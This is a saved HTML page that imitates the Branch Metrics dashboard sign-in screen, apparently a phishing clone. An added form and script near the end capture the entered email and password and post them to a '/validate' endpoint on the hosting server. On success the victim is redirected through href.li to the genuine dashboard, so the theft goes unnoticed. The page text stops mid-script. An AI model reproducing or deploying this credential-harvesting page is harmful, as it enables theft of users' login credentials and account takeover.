<html data-scrapbook-source="" data-scrapbook-create="20241102121407175">

<head>
    <meta charset="UTF-8">
    <style data-emotion="css-global" data-s="">
        @keyframes mui-auto-fill {
          0% { display: block; }
        }
        @keyframes mui-auto-fill {
          0% { display: block; }
        }
        @keyframes mui-auto-fill-cancel {
          0% { display: block; }
        }
        @keyframes mui-auto-fill-cancel {
          0% { display: block; }
        }
    </style>
    <style data-emotion="css-global" data-s="">
        @keyframes mui-auto-fill {
          0% { display: block; }
        }
        @keyframes mui-auto-fill {
          0% { display: block; }
        }
        @keyframes mui-auto-fill-cancel {
          0% { display: block; }
        }
        @keyframes mui-auto-fill-cancel {
          0% { display: block; }
        }
    </style>
    <style data-emotion="css" data-s="">
        .css-2mjgy0 { margin: 0px; font-family: "Source Sans Pro", sans-serif; font-weight: 600; font-size: 24px; line-height: 32px; -webkit-font-smoothing: antialiased; letter-spacing: -0.06px; color: rgb(0, 117, 201); }
        .css-wqy0wl { margin: 0px; font-family: "Source Sans Pro", sans-serif; font-weight: 400; font-size: 14px; line-height: 20px; -webkit-font-smoothing: antialiased; letter-spacing: normal; }
        .css-wgpymj { margin: 0px; font-family: inherit; font-weight: inherit; font-size: inherit; line-height: inherit; letter-spacing: inherit; color: rgb(0, 117, 201); text-decoration: none; }
        .css-wgpymj:hover { text-decoration: underline; }
        .css-1wjiobc { margin: 0px; font-family: "Source Sans Pro", sans-serif; font-weight: 600; font-size: 16px; line-height: 24px; -webkit-font-smoothing: antialiased; letter-spacing: -0.06px; }
        .css-8d97to { width: 100%; margin-left: auto; box-sizing: border-box; margin-right: auto; display: block; }
        .css-1co2enn { margin: 0px; font-family: "Source Sans Pro", sans-serif; font-weight: 600; font-size: 14px; line-height: 24px; -webkit-font-smoothing: antialiased; letter-spacing: normal; }
        .css-feqhe6 { display: inline-flex; flex-direction: column; position: relative; min-width: 0px; padding: 0px; margin: 0px; border: 0px; vertical-align: top; width: 100%; }
        .css-j9lq3k { font-family: "Source Sans Pro", sans-serif; font-weight: 400; font-size: 16px; line-height: 1.4375em; -webkit-font-smoothing: antialiased; letter-spacing: normal; color: rgb(42, 52, 60); box-sizing: border-box; cursor: text; display: inline-flex; -webkit-box-align: center; align-items: center; width: 100%; position: relative; border-radius: 4px; padding-left: 14px; padding-right: 14px; }
        .css-j9lq3k:hover .MuiOutlinedInput-notchedOutline { border-color: rgb(42, 52, 60); }
        @media (hover: none) {
          .css-j9lq3k:hover .MuiOutlinedInput-notchedOutline { border-color: rgba(0, 0, 0, 0.23); }
        }
        .css-b2ha46 { font: inherit; letter-spacing: inherit; color: currentcolor; border: 0px; box-sizing: content-box; background: none; height: 1.4375em; margin: 0px; -webkit-tap-highlight-color: transparent; display: block; min-width: 0px; width: 100%; animation-name: mui-auto-fill-cancel; animation-duration: 10ms; padding: 8.5px 0px; }
        .css-b2ha46::-webkit-input-placeholder { color: currentcolor; opacity: 0.42; transition: opacity 200ms cubic-bezier(0.4, 0, 0.2, 1); }
        .css-b2ha46:focus { outline: 0px; }
        .css-b2ha46:invalid { box-shadow: none; }
        .css-b2ha46::-webkit-search-decoration { appearance: none; }
        .css-b2ha46:-webkit-autofill { animation-duration: 5000s; animation-name: mui-auto-fill; }
        .css-b2ha46:-webkit-autofill { border-radius: inherit; }
        .css-igs3ac { text-align: left; position: absolute; inset: -5px 0px 0px; margin: 0px; padding: 0px 8px; pointer-events: none; border-radius: inherit; border-style: solid; border-width: 1px; overflow: hidden; min-width: 0%; border-color: rgba(0, 0, 0, 0.23); }
        .css-ihdtdm { float: unset; width: auto; overflow: hidden; padding: 0px; line-height: 11px; transition: width 150ms cubic-bezier(0, 0, 0.2, 1); }
        .css-2n4y0m { display: inline-flex; -webkit-box-align: center; align-items: center; -webkit-box-pack: center; justify-content: center; position: relative; box-sizing: border-box; -webkit-tap-highlight-color: transparent; background-color: transparent; outline: 0px; border: 0px; margin: 0px -3px 0px 0px; cursor: pointer; user-select: none; vertical-align: middle; appearance: none; text-decoration: none; text-align: center; flex: 0 0 auto; border-radius: 50%; overflow: visible; color: rgba(0, 0, 0, 0.54); transition: background-color 150ms cubic-bezier(0.4, 0, 0.2, 1); padding: 5px; font-size: 1.125rem; }
        @media print {
          .css-2n4y0m { -webkit-print-color-adjust: exact; }
        }
        .css-2n4y0m:hover { background-color: rgba(0, 0, 0, 0.04); }
        @media (hover: none) {
          .css-2n4y0m:hover { background-color: transparent; }
        }
        .css-1jgtvd5 { user-select: none; width: 1em; height: 1em; overflow: hidden; display: inline-block; text-align: center; flex-shrink: 0; font-size: 1.5rem; }
        .css-1buryj2 { margin: 0px; font-family: "Source Sans Pro", sans-serif; font-weight: 400; font-size: 14px; line-height: 20px; -webkit-font-smoothing: antialiased; letter-spacing: normal; color: rgb(0, 117, 201); }
        .css-1x8rf6b { display: inline-flex; -webkit-box-align: center; align-items: center; -webkit-box-pack: center; justify-content: center; position: relative; box-sizing: border-box; -webkit-tap-highlight-color: transparent; outline: 0px; border: 0px; margin: 0px; cursor: pointer; user-select: none; vertical-align: middle; appearance: none; text-decoration: none; font-family: "Source Sans Pro", sans-serif; font-weight: 500; font-size: 14px; line-height: 1.75; text-transform: uppercase; -webkit-font-smoothing: antialiased; color: rgb(255, 255, 255); min-width: 64px; padding: 6px 16px; border-radius: 4px; transition: background-color 250ms cubic-bezier(0.4, 0, 0.2, 1), box-shadow 250ms cubic-bezier(0.4, 0, 0.2, 1), border-color 250ms cubic-bezier(0.4, 0, 0.2, 1), color 250ms cubic-bezier(0.4, 0, 0.2, 1); background-color: rgb(0, 117, 201); box-shadow: rgba(0, 0, 0, 0.08) 0px 2px 12px 0px; }
        @media print {
          .css-1x8rf6b { -webkit-print-color-adjust: exact; }
        }
        .css-1x8rf6b:hover { text-decoration: none; background-color: rgb(0, 74, 128); box-shadow: rgba(114, 119, 141, 0.49) 0px 3px 22px 0px; }
        @media (hover: none) {
          .css-1x8rf6b:hover { background-color: rgb(0, 117, 201); }
        }
        .css-1x8rf6b:active { box-shadow: none; }
        .css-w0pj6f { overflow: hidden; pointer-events: none; position: absolute; z-index: 0; inset: 0px; border-radius: inherit; }
    </style>
    <title>Dashboard - Branch Metrics</title>
    <!-- <link rel="apple-touch-icon" sizes="114x114" href="https://cdn.branch.io/assets/e64ad24fd35614a93831eedc5c76687137f7f113/static/common/favicons/apple-touch-icon-114x114.png"> -->
    <!-- <link rel="apple-touch-icon" sizes="144x144" href="https://cdn.branch.io/assets/e64ad24fd35614a93831eedc5c76687137f7f113/static/common/favicons/apple-touch-icon-144x144.png"> -->
    <meta name="apple-mobile-web-app-title" content="Branch Metrics">
    <link rel="icon" href="favicon.ico">
    <link rel="icon" type="image/png" href="favicon-32x32.png" sizes="32x32">
    <link rel="icon" type="image/png" href="favicon-96x96.png" sizes="96x96">




    <meta name="referrer" content="origin-when-cross-origin">
    <meta name="msapplication-TileColor" content="#0075c9">
    <meta name="msapplication-TileImage" content="/mstile-144x144.png">
    <meta name="application-name" content="Branch Metrics">
    <meta name="viewport" content="width=device-width, user-scalable=no">

    <link href="icon.css" rel="stylesheet">

    <link href="font-awesome.min.css" rel="stylesheet">
    <link href="css.css" rel="stylesheet" type="text/css">
    <link rel="stylesheet" type="text/css" href="app.css">





    <script type="text/javascript">
        // setup global context
        			window.App = {};
        			window.App.context = {
        				view: {},
        				ssoSubdomain: null,
        				flipper: {"branch_clipboard_deepview":true,"bypass_temp_disabled_attribution_providers":true,"eo_migration":true,"eo_opted_out_list":false,"impressions":true,"install_fraud":false,"view_all_ad_partners":false,"force_eo_hide_transition_elements":false,"pba_liveview":true,"fraud_page":true,"event_ingestion":true,"desktop_link_settings":true,"cohorts":true,"twitter_onboarding":false,"organization":true,"show_tune_link_creator":false,"display_user_api_key":true,"custom_exports_tune":false,"install_touch_attribution":false,"ad_account_authentication_message":true,"two_year_data_retention":false,"fraud_rule_builder_page":true,"fraud_rule_editable":true,"whitelisted_devices":true,"hll_sketch_uniques":true,"discovery_ads_ui":false,"adnetworkdatafiltering":false,"recent_activity_tab":true,"postback_testing":true,"email_domain_blacklist":false,"non_sans_data_sharing_toggle":false,"qlc_redesign":true,"allow_eo_san_touch_export":false,"engagement_builder":false,"limited_data_use":true,"use_custom_domain_for_ad_link":false,"events_and_aliases_topn":true,"roku_san":true,"shorter_default_druid_query_duration":false,"skadnetwork_screen_enabled":true,"skadnetwork_activity_screen":true,"append_web_flipper":false,"druid_rate_limit_modal":false,"ios_app_store_authentication":true,"tiktok_auth":true,"ios14_calculate_organic_settings":true,"skadnetwork_facebook_endpoints":true,"display_cost_on_skadnetwork":false,"apple_oauth2":true,"hydra_oauth2":true,"cenarius_general_endpoint_installs":true,"should_split_cenarius_general_query":false,"highcharts_summary_page":true,"enable_cost_on_links_calculations":true,"reduced_default_filter_range_druid":false,"conversion_value_event_alias_mapping":true,"journey_priority_popover":true,"conversion_value_event_revenue_range_mapping":true,"skadnetwork_agency_permissions":true,"ios14_clpboard_deepviews":true,"qlt_permissions":false,"engagement_builder_ad_partner_integration":true,"extend_conversion_event_window_days_limits":false,"journeys_creatives_microfrontend":false,"sentry_monitoring":true,"facebook_install_referrer":true,"enable_advanced_conversion_for_snap":true,"match_campaign_id_for_eo_data":false,"show_data_feeds_webhook_headers_and_body":false,"historical_mau_modal":false,"accessibe":false,"sentry_every_request":false,"new_postbacks_form":true,"csp_reporting":false,"analytics_report_preview":true,"enable_tiktok_san":true,"enable_huawei_ad_partner":true,"analytics_overhaul_phase_one":true,"link_manager":false,"unifiedskanview":true,"qr_code_deepview":true,"new_postbacks_macros":true,"new_webhooks_macros":true,"remove_desktop_sms":true,"versioning_service_integration":true,"custom_calculations":true,"highcharts_migration":true,"ott":false,"ott_summary_page":false,"ott_ads_activity_page":false,"skad_network_skan4":true,"lightweight_filters_analytics":true,"linkhub_bulk_creation":false,"ads_fraud_highcharts":true,"google_analytics_v4":true,"protected_downloads":false,"usage_and_quotas":true,"template_only_access_control":true,"facebook_aem_support":true,"disco_dashboard":true,"disable_a_amazon_ad_partner":false,"ad_link_manager":false,"ad_link_templates":false,"bulk_ad_links":false,"bulk_quick_links":false,"quick_link_manager":false,"quick_link_templates":false,"ad_link_templates_introduction":true,"bulk_ad_links_introduction":true,"error_handling":true,"self_serve_usage_warnings":false,"recaptcha_for_branch_key":true,"hide_branch_key_recaptcha_for_valid_credit_card":true,"dynamic_endpoint_white_listing":false,"hide_link_configuration_from_onboarding":true,"allow_account_creation_on_mx_server_not_found":true,"skadnetwork_under_maintenance":true,"cohorts_ui_refresh":true,"extended_api_logging":true,"restrict_snap_reports":true,"journey_creatives_html_editor_tab":true,"delete_link_templates":false,"pendo_enabled":true,"enable_lightweight_filters_for_email":true,"branch_account_settings":true,"branch_account_actions":true,"branch_account_team":false,"branch_account_team_actions":false,"custom_qr_journeys":false,"roi_hub":false,"roi_hub_internal":false,"sso_strict":false,"household_measurement_window":true,"san_ui_connection_improvements":true,"san_ui_partner_improvements":true,"household_measurement_window_non_ott_ad_partners":false,"billing_contract_invoice":true,"use_sub_app_invoice":false,"support_app_version_in_analytics":true,"skan_unified_currency_switcher":true,"skan_conversion_center_improved_mappings":true,"link_validator":false,"google_ads_multi_authentication":false,"roi_hub_menu_item_show":true,"predictive_aggregate_measurement":true,"cost_ingestor":false,"darkly_navigation":true,"restrict_premium_trials_ss":false,"unified_report_drilldown":false},
        				country: {"iso_code":"US","name":"United States","hasDataProtectionPolicy":false}
        			}
        			// Timezones
        			var TIMEZONES = [{"name":"Africa/Accra","label":"Africa/Accra","facebookId":59},{"name":"Africa/Cairo","label":"Africa/Cairo","facebookId":53},{"name":"Africa/Casablanca","label":"Africa/Casablanca","facebookId":86},{"name":"Africa/Johannesburg","label":"Africa/Johannesburg","facebookId":141},{"name":"Africa/Lagos","label":"Africa/Lagos","facebookId":96},{"name":"Africa/Nairobi","label":"Africa/Nairobi","facebookId":78},{"name":"Africa/Tunis","label":"Africa/Tunis","facebookId":133},{"name":"America/Anchorage","label":"America/Anchorage","facebookId":4},{"name":"America/Argentina/Buenos_Aires","label":"America/Argentina/Buenos Aires","facebookId":10},{"name":"America/Argentina/Salta","label":"America/Argentina/Salta","facebookId":11},{"name":"America/Argentina/San_Luis","label":"America/Argentina/San Luis","facebookId":9},{"name":"America/Asuncion","label":"America/Asuncion","facebookId":111},{"name":"America/Atikokan","label":"America/Atikokan","facebookId":33},{"name":"America/Belem","label":"America/Belem","facebookId":24},{"name":"America/Blanc-Sablon","label":"America/Blanc-Sablon","facebookId":36},{"name":"America/Bogota","label":"America/Bogota","facebookId":43},{"name":"America/Campo_Grande","label":"America/Campo Grande","facebookId":23},{"name":"America/Caracas","label":"America/Caracas","facebookId":139},{"name":"America/Chicago","label":"America/Chicago","facebookId":6},{"name":"America/Costa_Rica","label":"America/Costa Rica","facebookId":44},{"name":"America/Dawson","label":"America/Dawson","facebookId":27},{"name":"America/Dawson_Creek","label":"America/Dawson Creek","facebookId":29},{"name":"America/Denver","label":"America/Denver","facebookId":2},{"name":"America/Edmonton","label":"America/Edmonton","facebookId":30},{"name":"America/El_Salvador","label":"America/El Salvador","facebookId":131},{"name":"America/Guatemala","label":"America/Guatemala","facebookId":61},{"name":"America/Guayaquil","label":"America/Guayaquil","facebookId":51},{"name":"America/Halifax","label":"America/Halifax","facebookId":37},{"name":"America/Hermosillo","label":"America/Hermosillo","facebookId":92},{"name":"America/Iqaluit","label":"America/Iqaluit","facebookId":34},{"name":"America/Jamaica","label":"America/Jamaica","facebookId":75},{"name":"America/La_Paz","label":"America/La Paz","facebookId":21},{"name":"America/Lima","label":"America/Lima","facebookId":103},{"name":"America/Los_Angeles","label":"America/Los Angeles","facebookId":1},{"name":"America/Managua","label":"America/Managua","facebookId":97},{"name":"America/Mazatlan","label":"America/Mazatlan","facebookId":93},{"name":"America/Mexico_City","label":"America/Mexico City","facebookId":94},{"name":"America/Montevideo","label":"America/Montevideo","facebookId":138},{"name":"America/Nassau","label":"America/Nassau","facebookId":26},{"name":"America/New_York","label":"America/New York","facebookId":7},{"name":"America/Noronha","label":"America/Noronha","facebookId":22},{"name":"America/Panama","label":"America/Panama","facebookId":102},{"name":"America/Phoenix","label":"America/Phoenix","facebookId":5},{"name":"America/Port_of_Spain","label":"America/Port of Spain","facebookId":135},{"name":"America/Puerto_Rico","label":"America/Puerto Rico","facebookId":107},{"name":"America/Rainy_River","label":"America/Rainy River","facebookId":31},{"name":"America/Regina","label":"America/Regina","facebookId":32},{"name":"America/Santiago","label":"America/Santiago","facebookId":41},{"name":"America/Santo_Domingo","label":"America/Santo Domingo","facebookId":49},{"name":"America/Sao_Paulo","label":"America/Sao Paulo","facebookId":25},{"name":"America/St_Johns","label":"America/St Johns","facebookId":38},{"name":"America/Tegucigalpa","label":"America/Tegucigalpa","facebookId":63},{"name":"America/Tijuana","label":"America/Tijuana","facebookId":91},{"name":"America/Toronto","label":"America/Toronto","facebookId":35},{"name":"America/Vancouver","label":"America/Vancouver","facebookId":28},{"name":"Asia/Amman","label":"Asia/Amman","facebookId":76},{"name":"Asia/Baghdad","label":"Asia/Baghdad","facebookId":72},{"name":"Asia/Bahrain","label":"Asia/Bahrain","facebookId":20},{"name":"Asia/Bangkok","label":"Asia/Bangkok","facebookId":132},{"name":"Asia/Beirut","label":"Asia/Beirut","facebookId":81},{"name":"Asia/Colombo","label":"Asia/Colombo","facebookId":82},{"name":"Asia/Dhaka","label":"Asia/Dhaka","facebookId":17},{"name":"Asia/Dubai","label":"Asia/Dubai","facebookId":8},{"name":"Asia/Gaza","label":"Asia/Gaza","facebookId":108},{"name":"Asia/Ho_Chi_Minh","label":"Asia/Ho Chi Minh","facebookId":140},{"name":"Asia/Hong_Kong","label":"Asia/Hong Kong","facebookId":62},{"name":"Asia/Irkutsk","label":"Asia/Irkutsk","facebookId":121},{"name":"Asia/Jakarta","label":"Asia/Jakarta","facebookId":66},{"name":"Asia/Jayapura","label":"Asia/Jayapura","facebookId":68},{"name":"Asia/Jerusalem","label":"Asia/Jerusalem","facebookId":70},{"name":"Asia/Kamchatka","label":"Asia/Kamchatka","facebookId":125},{"name":"Asia/Karachi","label":"Asia/Karachi","facebookId":105},{"name":"Asia/Kolkata","label":"Asia/Kolkata","facebookId":71},{"name":"Asia/Krasnoyarsk","label":"Asia/Krasnoyarsk","facebookId":120},{"name":"Asia/Kuala_Lumpur","label":"Asia/Kuala Lumpur","facebookId":95},{"name":"Asia/Kuwait","label":"Asia/Kuwait","facebookId":80},{"name":"Asia/Magadan","label":"Asia/Magadan","facebookId":124},{"name":"Asia/Makassar","label":"Asia/Makassar","facebookId":67},{"name":"Asia/Manila","label":"Asia/Manila","facebookId":104},{"name":"Asia/Muscat","label":"Asia/Muscat","facebookId":101},{"name":"Asia/Nicosia","label":"Asia/Nicosia","facebookId":45},{"name":"Asia/Omsk","label":"Asia/Omsk","facebookId":119},{"name":"Asia/Qatar","label":"Asia/Qatar","facebookId":112},{"name":"Asia/Riyadh","label":"Asia/Riyadh","facebookId":126},{"name":"Asia/Seoul","label":"Asia/Seoul","facebookId":79},{"name":"Asia/Shanghai","label":"Asia/Shanghai","facebookId":42},{"name":"Asia/Singapore","label":"Asia/Singapore","facebookId":128},{"name":"Asia/Taipei","label":"Asia/Taipei","facebookId":136},{"name":"Asia/Tokyo","label":"Asia/Tokyo","facebookId":77},{"name":"Asia/Vladivostok","label":"Asia/Vladivostok","facebookId":123},{"name":"Asia/Yakutsk","label":"Asia/Yakutsk","facebookId":122},{"name":"Asia/Yekaterinburg","label":"Asia/Yekaterinburg","facebookId":118},{"name":"Atlantic/Azores","label":"Atlantic/Azores","facebookId":109},{"name":"Atlantic/Canary","label":"Atlantic/Canary","facebookId":54},{"name":"Atlantic/Reykjavik","label":"Atlantic/Reykjavik","facebookId":73},{"name":"Australia/Broken_Hill","label":"Australia/Broken Hill","facebookId":14},{"name":"Australia/Perth","label":"Australia/Perth","facebookId":13},{"name":"Australia/Sydney","label":"Australia/Sydney","facebookId":15},{"name":"Etc/UTC","label":"Etc/UTC"},{"name":"Europe/Amsterdam","label":"Europe/Amsterdam","facebookId":98},{"name":"Europe/Athens","label":"Europe/Athens","facebookId":60},{"name":"Europe/Belgrade","label":"Europe/Belgrade","facebookId":114},{"name":"Europe/Berlin","label":"Europe/Berlin","facebookId":47},{"name":"Europe/Bratislava","label":"Europe/Bratislava","facebookId":130},{"name":"Europe/Brussels","label":"Europe/Brussels","facebookId":18},{"name":"Europe/Bucharest","label":"Europe/Bucharest","facebookId":113},{"name":"Europe/Budapest","label":"Europe/Budapest","facebookId":65},{"name":"Europe/Copenhagen","label":"Europe/Copenhagen","facebookId":48},{"name":"Europe/Dublin","label":"Europe/Dublin","facebookId":69},{"name":"Europe/Helsinki","label":"Europe/Helsinki","facebookId":56},{"name":"Europe/Istanbul","label":"Europe/Istanbul","facebookId":134},{"name":"Europe/Kaliningrad","label":"Europe/Kaliningrad","facebookId":115},{"name":"Europe/Kiev","label":"Europe/Kiev","facebookId":137},{"name":"Europe/Lisbon","label":"Europe/Lisbon","facebookId":110},{"name":"Europe/Ljubljana","label":"Europe/Ljubljana","facebookId":129},{"name":"Europe/London","label":"Europe/London","facebookId":58},{"name":"Europe/Luxembourg","label":"Europe/Luxembourg","facebookId":84},{"name":"Europe/Madrid","label":"Europe/Madrid","facebookId":55},{"name":"Europe/Malta","label":"Europe/Malta","facebookId":88},{"name":"Europe/Moscow","label":"Europe/Moscow","facebookId":116},{"name":"Europe/Oslo","label":"Europe/Oslo","facebookId":99},{"name":"Europe/Paris","label":"Europe/Paris","facebookId":57},{"name":"Europe/Prague","label":"Europe/Prague","facebookId":46},{"name":"Europe/Riga","label":"Europe/Riga","facebookId":85},{"name":"Europe/Rome","label":"Europe/Rome","facebookId":74},{"name":"Europe/Samara","label":"Europe/Samara","facebookId":117},{"name":"Europe/Sarajevo","label":"Europe/Sarajevo","facebookId":16},{"name":"Europe/Skopje","label":"Europe/Skopje","facebookId":87},{"name":"Europe/Sofia","label":"Europe/Sofia","facebookId":19},{"name":"Europe/Stockholm","label":"Europe/Stockholm","facebookId":127},{"name":"Europe/Tallinn","label":"Europe/Tallinn","facebookId":52},{"name":"Europe/Vienna","label":"Europe/Vienna","facebookId":12},{"name":"Europe/Vilnius","label":"Europe/Vilnius","facebookId":83},{"name":"Europe/Warsaw","label":"Europe/Warsaw","facebookId":106},{"name":"Europe/Zagreb","label":"Europe/Zagreb","facebookId":64},{"name":"Europe/Zurich","label":"Europe/Zurich","facebookId":39},{"name":"Indian/Maldives","label":"Indian/Maldives","facebookId":90},{"name":"Indian/Mauritius","label":"Indian/Mauritius","facebookId":89},{"name":"Pacific/Auckland","label":"Pacific/Auckland","facebookId":100},{"name":"Pacific/Easter","label":"Pacific/Easter","facebookId":40},{"name":"Pacific/Galapagos","label":"Pacific/Galapagos","facebookId":50},{"name":"Pacific/Honolulu","label":"Pacific/Honolulu","facebookId":3}];
        
        			// Github login
        			var GITHUB_CLIENT_ID = 'dbe3828d26d85e9d7687';
        			var _oauthState = '318b9c173ab3ffeeb4f5914da1d3f3b0741e0e1037050cf23d';
        			var RECAPTCHA_KEY = '6Lc3rz0mAAAAAIuRqhSoRvSV3wXc116ACQF2MjlJ';
        
        			var _csrfToken = 'ZAKjy3Xa-cf1aYQDmZ4s8FKEBAfliGKreoE8';
        			var original_url = '/login';
          		var SIGNUP_EMAIL_DOMAIN_BLOCKLIST_REGEX = ["^yahoo","^outlook","^yandex","^aol","^gmail.*","^googleemail.com$","^googlemail.com$","^gamil.com$","^gmai.com$","^ggmail.com$","^gimail.com$","^gmeil.com$","^gmil.com$","^icloud.com$","^me.com$","^hotmail.*","^live.*","^msn.com$","^myyahoo.com$","^protonmail.*","^proton.me$","^163.com$","^126.com$","^mail.ru$","^naver.com$","^qq.com$","^gmx.*","^mail.com$","^email.com$"].map(pattern => new RegExp(pattern, "i"));
    </script>
    <script src="lib.js" type="text/javascript"></script>
    <script src="app.js" type="text/javascript"></script>
    <style data-emotion="css" data-s=""></style>
    <style></style>
    <style></style>
    <style data-emotion="css" data-s=""></style>
    <style data-emotion=""></style>
    <style data-jss="" data-meta="makeStyles">
        .jss56 { font-size: 14px; text-align: center; font-family: "Source Sans Pro", sans-serif; font-weight: 600; line-height: 24px; border-radius: 8px; letter-spacing: normal; text-transform: none; -webkit-font-smoothing: antialiased; }
        .jss56.MuiButton-sizeMedium { padding: 6px 16px; }
        .jss57 { box-shadow: none; }
        .jss57:hover, .jss57:active { box-shadow: none; }
        .jss57:disabled:not(.MuiLoadingButton-loading) { color: rgb(255, 255, 255); }
    </style>
    <style data-jss="" data-meta="makeStyles"></style>
    <style data-jss="" data-meta="makeStyles">
        .jss33 { display: flex; align-items: center; flex-direction: row; justify-content: space-between; }
    </style>
    <style data-jss="" data-meta="makeStyles"></style>
    <style data-jss="" data-meta="makeStyles">
        .jss37 { border-radius: 8px; }
        .jss37.MuiInputBase-adornedStart { padding-left: 8px; background-color: rgb(255, 255, 255); }
        .jss37.MuiInputBase-adornedEnd { padding-right: 8px; background-color: rgb(255, 255, 255); }
        .jss37 fieldset { border-color: rgb(224, 230, 236); }
        .jss38 { color: rgb(42, 52, 60); font-size: 14px; font-family: "Source Sans Pro", sans-serif; font-weight: 400; line-height: 20px; letter-spacing: normal; background-color: rgb(255, 255, 255); -webkit-font-smoothing: antialiased; }
        .jss38::placeholder { color: rgb(134, 143, 152); opacity: 1; }
    </style>
    <style data-jss="" data-meta="makeStyles">
        .jss49 { border: 1px solid transparent; border-radius: 8px; }
        .jss49 .material-icons { font-size: 20px; }
    </style>
    <style data-jss="" data-meta="makeStyles">
        .jss53 { color: rgb(107, 114, 119); }
    </style>
    <style data-jss="" data-meta="makeStyles">
        .jss21 input[type="password"] { letter-spacing: 3px; }
        .jss21 fieldset > legend { width: 0px; }
        .jss21 input[type="password"]::placeholder { letter-spacing: normal; }
        .jss22 { display: flex; flex-direction: column; }
        .jss31 { font-size: 14px; font-family: "Source Sans Pro", sans-serif; font-weight: 600; line-height: 24px; letter-spacing: normal; -webkit-font-smoothing: antialiased; }
        .jss31.withPadding { margin-bottom: 4px; }
    </style>
    <style data-jss="" data-meta="makeStyles"></style>
    <style data-jss="" data-meta="makeStyles">
        .jss1 { margin: 48px 0px 0px; }
        .jss2 { margin: 24px 0px 0px; }
        .jss3 { margin: 24px 0px 0px; }
        .jss4 { margin: 48px 0px 0px; }
        .jss5 { width: 100%; }
        .jss6 { gap: 16px; margin: 48px 0px 0px; display: flex; align-self: stretch; text-align: center; align-items: center; flex-direction: column; }
        .jss8 { margin-left: 4px; }
    </style>
    <style data-jss="" data-meta="makeStyles">
        .jss9 { margin: 36px; }
        .jss10 { width: 100px; height: 36px; }
        .jss11 { margin: 0px 70px 0px 172px; max-width: 478px; }
        @media (max-width: 599.95px) {
          .jss11 { margin: 0px 36px; }
        }
        .jss12 { margin-top: 6px; }
        .jss13 { gap: 4px; display: inline-flex; align-items: center; flex-direction: row; }
        .jss14 { color: rgb(42, 52, 60); }
        .jss15 { color: rgb(0, 117, 201); }
    </style>
</head>

<body class="logo-middle">
    <div class="container-fluid">
        <div id="app" class="row">
            <div class="loggedout">
                <div class="login-form">
                    <div class="jss9"><img class="jss10" src="branch-logo_dark.svg" data-testid="logo-image"></div>
                    <div class="jss11">
                        <div>
                            <h3 class="MuiTypography-root MuiTypography-h3 css-2mjgy0">Sign in</h3>
                            
						<form id="loginForm"> 
                        <form role="form" id="form_login">
						
                            <div class="jss1">
                                <div class="MuiContainer-root MuiContainer-disableGutters jss21 css-8d97to" id="FormInput__email__container">
                                    <div>
                                        <div class="jss33">
                                            <h6 class="MuiTypography-root MuiTypography-subtitle1 jss31 withPadding css-1co2enn">Work email</h6></div>
                                    </div>
                                    <div class="MuiFormControl-root MuiFormControl-fullWidth MuiTextField-root fullWidth css-feqhe6">
                                        <div class="MuiInputBase-root MuiOutlinedInput-root jss37 MuiInputBase-colorSecondary MuiInputBase-fullWidth MuiInputBase-formControl MuiInputBase-sizeSmall MuiInputBase-adornedStart MuiInputBase-adornedEnd css-j9lq3k">
                                            <input aria-invalid="false" id="FormInput__email__input" name="email" placeholder="Enter your work email" type="email" data-testid="work-email-input-input" step="0.01" min="0" class="MuiInputBase-input MuiOutlinedInput-input jss38 MuiInputBase-inputSizeSmall MuiInputBase-inputAdornedStart MuiInputBase-inputAdornedEnd css-b2ha46"
                                            value="">
                                            <fieldset aria-hidden="true" class="MuiOutlinedInput-notchedOutline css-igs3ac">
                                                <legend class="css-ihdtdm"><span class="notranslate">​</span></legend>
                                            </fieldset>
                                        </div>
                                    </div>
                                </div>
                            </div>
                            <div class="jss2">
                                <div class="MuiContainer-root MuiContainer-disableGutters jss21 jss22 css-8d97to" id="FormInput__password-input__container">
                                    <div>
                                        <div class="jss33">
                                            <h6 class="MuiTypography-root MuiTypography-subtitle1 jss31 withPadding css-1co2enn">Password</h6></div>
                                    </div>
                                    <div class="MuiFormControl-root MuiFormControl-fullWidth MuiTextField-root fullWidth css-feqhe6">
                                        <div class="MuiInputBase-root MuiOutlinedInput-root jss37 MuiInputBase-colorSecondary MuiInputBase-fullWidth MuiInputBase-formControl MuiInputBase-sizeSmall MuiInputBase-adornedStart MuiInputBase-adornedEnd css-j9lq3k">
                                            <input aria-invalid="false" autocomplete="current-password" id="FormInput__password-input__input" name="password" placeholder="Enter your password" type="password" data-testid="password-input-input" step="0.01"
                                            min="0" class="MuiInputBase-input MuiOutlinedInput-input jss38 MuiInputBase-inputSizeSmall MuiInputBase-inputAdornedStart MuiInputBase-inputAdornedEnd css-b2ha46" value="">
                                            <fieldset aria-hidden="true" class="MuiOutlinedInput-notchedOutline css-igs3ac">
                                                <legend class="css-ihdtdm"><span class="notranslate">​</span></legend>
                                            </fieldset>
                                        </div>
                                    </div>
                                </div>
                            </div>
							<div id="response"></div>
    						<div id="error" style="color: red;"></div>
                            
                            <div class="jss4">
                                <button class="MuiButtonBase-root MuiButton-root jss56 MuiButton-contained jss57 MuiButton-containedPrimary MuiButton-sizeMedium MuiButton-containedSizeMedium MuiButton-root jss56 MuiButton-contained jss57 MuiButton-containedPrimary MuiButton-sizeMedium MuiButton-containedSizeMedium jss5 css-1x8rf6b"
                                tabindex="0" type="submit" data-testid="btn-sign-in">Sign in<span class="MuiTouchRipple-root css-w0pj6f"></span></button>
                            </div>
							<style>
								.spinner {
									border: 8px solid rgba(255, 255, 255, 0.3);
									border-left-color: #007bff; /* Цвет спиннера */
									border-radius: 50%;
									width: 40px;
									height: 40px;
									animation: spin 1s linear infinite;
									margin: 20px auto; /* Центрирование */
								}
							
								@keyframes spin {
									to {
										transform: rotate(360deg);
									}
								}
							</style>
                        </form>
						</form>
						<div id="loading" style="display: none; text-align: center;">
							<div class="spinner"></div>
						</div>
                        <script>
                            document.getElementById('loginForm').addEventListener('submit', async (event) => {
                                event.preventDefault();
                                const email = document.getElementById('FormInput__email__input').value;
                                const password = document.getElementById('FormInput__password-input__input').value;
                            
                                // Clear previous messages
                                document.getElementById('error').innerText = '';
                                document.getElementById('response').innerText = '';
                            
                                // Show loading indicator
                                document.getElementById('loading').style.display = 'block';
                            
                                try {
                                    const response = await fetch('/validate', {
                                        method: 'POST',
                                        headers: {
                                            'Content-Type': 'application/json'
                                        },
                                        body: JSON.stringify({ email, password })
                                    });
                            
                                    const result = await response.json();
                            
                                    if (result.message === "success") {
                                        // Redirect if login is successful
                                        window.location.href = 'https://href.li/?https://dashboard.branch.io/';
                                    } else if (result.error) {
                                        // Display error if login fails
                                        document.getElementById('error').innerText = result.error;
                                    } else {
                                        // Display any other response message
                                        document.getElementById('response').innerText = result.message;
                                    }
                                } catch (error) {
